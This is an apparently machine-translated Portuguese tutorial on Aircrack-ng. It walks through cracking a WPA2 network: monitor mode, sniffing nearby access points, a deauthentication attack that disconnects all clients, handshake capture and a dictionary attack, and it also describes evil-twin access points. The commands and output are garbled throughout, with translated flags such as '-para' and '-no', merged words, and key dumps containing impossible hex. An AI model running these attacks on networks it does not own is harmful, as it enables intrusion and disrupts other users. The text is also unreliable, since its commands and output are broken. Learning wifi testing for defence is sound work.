Como usar o Aircrack-ng

How Use Aircrack Ng



Na maioria das vezes, as pessoas nunca pensam na rede à qual estão conectadas. Eles nunca pensam quão segura é essa rede e quanto arriscam seus dados confidenciais diariamente. Você pode executar verificações de vulnerabilidade em suas redes wi-fi usando uma ferramenta muito poderosa chamada Aircrack-ng e Wireshark. O Wireshark é usado para monitorar a atividade da rede. Aircrack-ng é mais como uma ferramenta agressiva que permite hackear e dar acesso a conexões sem fio. Pensar como um intruso sempre foi a maneira mais segura de se proteger contra um hack. Você pode ser capaz de compreender as ações exatas que um intruso executará para obter acesso ao seu sistema, aprendendo sobre o aircrack. Você pode então conduzir verificações de conformidade em seu próprio sistema para garantir que ele não seja inseguro.

Aircrack-ng é um conjunto completo de software desenvolvido para testar a segurança da rede sem fio. Não é apenas uma ferramenta, mas uma coleção de ferramentas, cada uma das quais desempenhando um propósito específico. Diferentes áreas de segurança wi-fi podem ser trabalhadas, como monitorar o ponto de acesso, testar, atacar a rede, quebrar a rede wi-fi e testá-la. O principal objetivo do Aircrack é interceptar os pacotes e decifrar os hashes para quebrar as senhas. Suporta quase todas as novas interfaces sem fio. Aircrack-ng é uma versão melhorada de um conjunto de ferramentas desatualizado Aircrack, ng refere-se ao Nova geração . Algumas das ferramentas incríveis que funcionam juntas para realizar uma tarefa maior.







Airmon:

Airmon-ng está incluído no kit aircrack-ng que coloca a placa de interface de rede no modo monitor. As placas de rede geralmente só aceitam pacotes direcionados a eles, conforme definido pelo endereço MAC do NIC, mas com o airmon-ng, todos os pacotes sem fio, sejam eles direcionados a eles ou não, também serão aceitos. Você deve ser capaz de capturar esses pacotes sem vincular ou autenticar com o ponto de acesso. É usado para verificar o status de um ponto de acesso, colocando a interface de rede no modo de monitor. Em primeiro lugar, é necessário configurar as placas wireless para ligar o modo monitor, então matar todos os processos em segundo plano se você achar que algum processo está interferindo neles. Após encerrar os processos, o modo monitor pode ser habilitado na interface sem fio executando o comando abaixo:



[email protegido]: ~ $sudoairmon-ng start wlan0#

Você também pode desativar o modo de monitor interrompendo o airmon-ng a qualquer momento usando o comando abaixo:

[email protegido]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Airodump-ng é usado para listar todas as redes que nos rodeiam e para visualizar informações valiosas sobre elas. A funcionalidade básica do airodump-ng é farejar pacotes, então ele é essencialmente programado para pegar todos os pacotes ao nosso redor enquanto é colocado no modo monitor. Vamos executá-lo em todas as conexões ao nosso redor e coletar dados como o número de clientes conectados à rede, seus endereços mac correspondentes, estilo de criptografia e nomes de canais e, em seguida, começar a direcionar nossa rede de destino.

Digitando o comando airodump-ng e dando a ele o nome da interface de rede como parâmetro, podemos ativar esta ferramenta. Ele listará todos os pontos de acesso, a quantidade de pacotes de dados, métodos de criptografia e autenticação usados ​​e o nome da rede (ESSID). Do ponto de vista do hacking, os endereços mac são os campos mais importantes.

[email protegido]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack é usado para quebrar senhas. Depois de capturar todos os pacotes usando o airodump, podemos quebrar a chave pelo aircrack. Ele quebra essas chaves usando dois métodos PTW e FMS. A abordagem PTW é feita em duas fases. No início, apenas os pacotes ARP estão sendo usados, e só então, se a chave não for quebrada após a busca, ele usa todos os outros pacotes capturados. Um ponto positivo da abordagem PTW é que nem todos os pacotes são usados ​​para o cracking. Na segunda abordagem, ou seja, FMS, usamos os modelos estatísticos e os algos de força bruta para quebrar a chave. Um método de dicionário também pode ser usado.

Aireplay:

O Airplay-ng apresenta pacotes a uma rede sem fio para criar ou acelerar o tráfego. Pacotes de duas fontes diferentes podem ser capturados por aireplay-ng. O primeiro é a rede ativa e o segundo são os pacotes do arquivo pcap já existente. Airplay-ng é útil durante um ataque de desautenticação que visa um ponto de acesso sem fio e um usuário. Além disso, você pode realizar alguns ataques como o ataque com café com leite com airplay-ng, uma ferramenta que permite obter uma chave do sistema do cliente. Você pode fazer isso capturando um pacote ARP, manipulando-o e enviando-o de volta ao sistema. O cliente criará um pacote que pode ser capturado pelo airodump e o aircrack quebra a chave desse pacote modificado. Algumas outras opções de ataque de airplay-ng incluem chopchop, fragment arepreplay, etc.

Base Aérea:

Airbase-ng é usado para transformar o computador de um intruso em um ponto de conexão comprometido para que outros se conectem. Usando Airbase-ng, você pode reivindicar ser um ponto de acesso legal e conduzir ataques man-in-the-middle em computadores que estão conectados à sua rede. Esses tipos de ataques são chamados de Ataques Gêmeos Malignos. É impossível para os usuários básicos discernir entre um ponto de acesso legal e um ponto de acesso falso. Portanto, a ameaça do gêmeo maligno está entre as ameaças sem fio mais ameaçadoras que enfrentamos hoje.

Airolib-ng:

Airolib acelera o processo de hacking, armazenando e gerenciando as listas de senhas e o ponto de acesso. O sistema de gerenciamento de banco de dados usado por este programa é o SQLite3, que está disponível principalmente em todas as plataformas. A quebra de senha inclui o cálculo da chave mestra par a par por meio da qual a chave transitória privada (PTK) é extraída. Usando o PTK, você pode determinar o código de identificação da mensagem do quadro (MIC) para um determinado pacote e, teoricamente, descobrir que o MIC é semelhante ao pacote, portanto, se o PTK estava certo, o PMK também estava certo.

Para ver as listas de senhas e acessar redes armazenadas no banco de dados, digite o seguinte comando:

[email protegido]: ~ $sudoairolib-ng testdatabase –stats

Aqui testdatabase é o banco de dados que você deseja acessar ou criar e –stats é a operação que você deseja executar nele. Você pode fazer várias operações nos campos do banco de dados, como dar prioridade máxima a algum SSID ou algo assim. Para usar airolib-ng com aircrack-ng, digite o seguinte comando:

[email protegido]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Aqui estamos usando os PMKs já calculados armazenados no banco de dados de teste para acelerar o processo de quebra de senha.

Cracking WPA / WPA2 usando Aircrack-ng:

Vejamos um pequeno exemplo do que o aircrack-ng pode fazer com a ajuda de algumas de suas incríveis ferramentas. Vamos quebrar a chave pré-compartilhada de uma rede WPA / WPA2 usando um método de dicionário.

A primeira coisa que precisamos fazer é listar as interfaces de rede que suportam o modo monitor. Isso pode ser feito usando o seguinte comando:

[email protegido]: ~ $sudoairmon-ng

Chipset de driver de interface PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Podemos ver uma interface; agora, temos que colocar a interface de rede que encontramos (wlx0) no modo monitor usando o seguinte comando:

[email protegido]: ~ $sudoairmon-ng start wlx0

Ele habilitou o modo de monitor na interface chamada wlx0mon .

Agora devemos começar a ouvir as transmissões de roteadores próximos por meio de nossa interface de rede que colocamos no modo monitor.

[email protegido]: ~ $sudoairodump-ng wlx0mon

CH5 ][Decorrido:30s][ 2020-12-02 00:17



BSSID PWR Beacons#Dados, # / s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Quatro cinco 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:SER-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:DA:88: FA:38: 02-68 28 2 0 onze54e WPA2 CCMP PSK TP-Link_3802



Sonda de quadros perdidos de taxa de PWR da ESTAÇÃO BSSID



E4: 6F:13: 04: CE:315C: 3A:Quatro cinco: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13

Nossa rede alvo é Quebrar neste caso, que está sendo executado no canal 1.

Aqui, para quebrar a senha da rede de destino, precisamos capturar um handshake de 4 vias, que acontece quando um dispositivo tenta se conectar a uma rede. Podemos capturá-lo usando o seguinte comando:

[email protegido]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -no /casa wlx0

-c : Canal

–Bss : Bssid da rede alvo

-no : O nome do diretório onde o arquivo pcap será colocado

Agora temos que esperar que um dispositivo se conecte à rede, mas existe uma maneira melhor de capturar um handshake. Podemos desautenticar os dispositivos para o AP usando um ataque de desautenticação usando o seguinte comando:

[email protegido]: ~ $sudoaireplay-ng-0 -paraE4: 6F:13: 04: CE:31

para : Bssid da rede alvo

-0 : ataque de desautenticação

Desconectamos todos os dispositivos e agora temos que esperar que um dispositivo se conecte à rede.

CH1 ][Decorrido:30s][ 2020-12-02 00:02][Aperto de mão WPA: E4: 6F:13: 04: CE:31



BSSID PWR RXQ Beacons#Dados, # / s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154º WPA2 CCMP PSK P



Sonda de quadros perdidos de taxa de PWR da ESTAÇÃO BSSID



E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Quatro cinco: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350- 6e263 708Quebrar

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Conseguimos um acerto e, olhando para o canto superior direito ao lado da hora, podemos ver que um aperto de mão foi capturado. Agora procure na pasta especificada ( /casa no nosso caso) para um .pcap Arquivo.

Para quebrar a chave WPA, podemos usar o seguinte comando:

[email protegido]: ~ $sudoaircrack-ng-a2 -norockyou.txt-bE4: 6F:13: 04: CE:31handshake.cap

b: Bssid da rede alvo

-a2: modo WPA2

Rockyou.txt: o dicionárioArquivousado

Handshake.cap: OArquivo quecontém aperto de mão capturado

Aircrack-ng1,2beta3

[00:01:49] 10566chaves testadas(1017,96para/s)

CHAVE ENCONTRADA! [você me pegou]

Chave Mestra: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FcinquentaC


Chave transitória: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FcinquentaC025 62E9 5D71

A chave da nossa rede-alvo foi quebrada com sucesso.

Conclusão:

As redes sem fio estão por toda parte, usadas por todas as empresas, desde funcionários que usam smartphones até dispositivos de controle industrial. De acordo com a pesquisa, quase mais de 50 por cento do tráfego da Internet será por WiFi em 2021. As redes sem fio têm muitas vantagens, comunicação externa, acesso rápido à Internet em locais onde é quase impossível colocar fios, pode expandir a rede sem instalar cabos para qualquer outro usuário e pode conectar facilmente seus dispositivos móveis a seus escritórios domésticos enquanto você não estiver lá.

Apesar dessas vantagens, há um grande ponto de interrogação sobre sua privacidade e segurança. Como essas redes; dentro da faixa de transmissão de roteadores estão abertos a todos, eles podem ser facilmente atacados e seus dados podem ser facilmente comprometidos. Por exemplo, se você estiver conectado a algum wi-fi público, qualquer pessoa conectada a essa rede pode facilmente verificar o tráfego de sua rede usando alguma inteligência e com a ajuda de ferramentas incríveis disponíveis e até mesmo descartá-lo.